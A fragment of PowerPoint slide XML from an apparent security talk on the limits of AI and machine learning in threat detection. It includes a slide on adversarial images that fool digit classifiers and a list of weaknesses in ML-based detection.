              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{616A328F-0AB8-41D4-AF36-08D128248EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId14"/>
          <a:srcRect b="53717"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7010955" y="3444861"/>
            <a:ext cx="460144" cy="510316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78" name="Picture 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55427305-CAD8-41E8-96A1-0F42F4C011BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId15"/>
          <a:srcRect b="55399"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6990048" y="4027948"/>
            <a:ext cx="481849" cy="503397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Picture 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DD2D3C-49C0-4773-BDB8-2B6E920E07DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId16"/>
          <a:srcRect b="53887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6465964" y="4014896"/>
            <a:ext cx="477508" cy="516449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="TextBox 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFBAE9D2-3102-4A52-AA9D-6C5620136D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114767" y="6375055"/>
            <a:ext cx="2143890" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="900" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>With thanks to Thomas Dullien</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4167550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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1469949"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4835578D-FE44-4CCF-84D5-6F52860BF2E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1529187" y="1508090"/>
            <a:ext cx="9131299" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FOOLING NEURAL NETWORKS FOR FUN &amp; PROFIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture 2" descr="http://www.evolvingai.org/sites/fish34.cs.uwyo.edu.lab/files/whitenoise_lenet_images_5_runs_0.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45AD0D32-1E34-4ABC-A948-FA962F2C64F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17410" y="1971306"/>
            <a:ext cx="4154852" cy="1828135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62778436-94FB-4A99-9F7B-695853ABFB16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1529187" y="4064859"/>
            <a:ext cx="9144000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>State of the art Neural Network believes with 99.99% probability these represents number 0-9. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A37DD5B3-AD58-4B95-9FE0-91F807409BDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2644492" y="4430145"/>
            <a:ext cx="6900687" cy="1005218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E0775B-21A9-4D21-B46B-6A3B26CD775F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2334873" y="5910518"/>
            <a:ext cx="7532628" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Above exploits the structure of how Neural Networks work for instance knowing there are yellow and black edges on a school bus.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3693177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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1469949"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{068E80D4-F569-4392-8246-D38B90356267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="817" r="-1" b="13031"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2325" y="1468892"/>
            <a:ext cx="12255595" cy="5388052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58FBD5CF-C3D2-41A2-B481-5DA30BA96F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1567302" y="2184982"/>
            <a:ext cx="3025695" cy="2769989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHY IS THE CURRENT STATE OF PLAY FLAWED?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Glorified anomaly detection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Does not work for targeted attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discriminative model needs a lot of training data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Training data has been shown to be inaccurate and outdated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generative models don’t reflect attackers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9994347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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41170" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456497" y="1492930"/>
            <a:ext cx="7719071" cy="5390746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63258CCE-738F-4644-8003-B0AE0257A289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6711957" y="2394232"/>
            <a:ext cx="3880241" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AI &amp; ML AS A TOOL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Behind all successful AI &amp; ML projects there is a clear problem statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
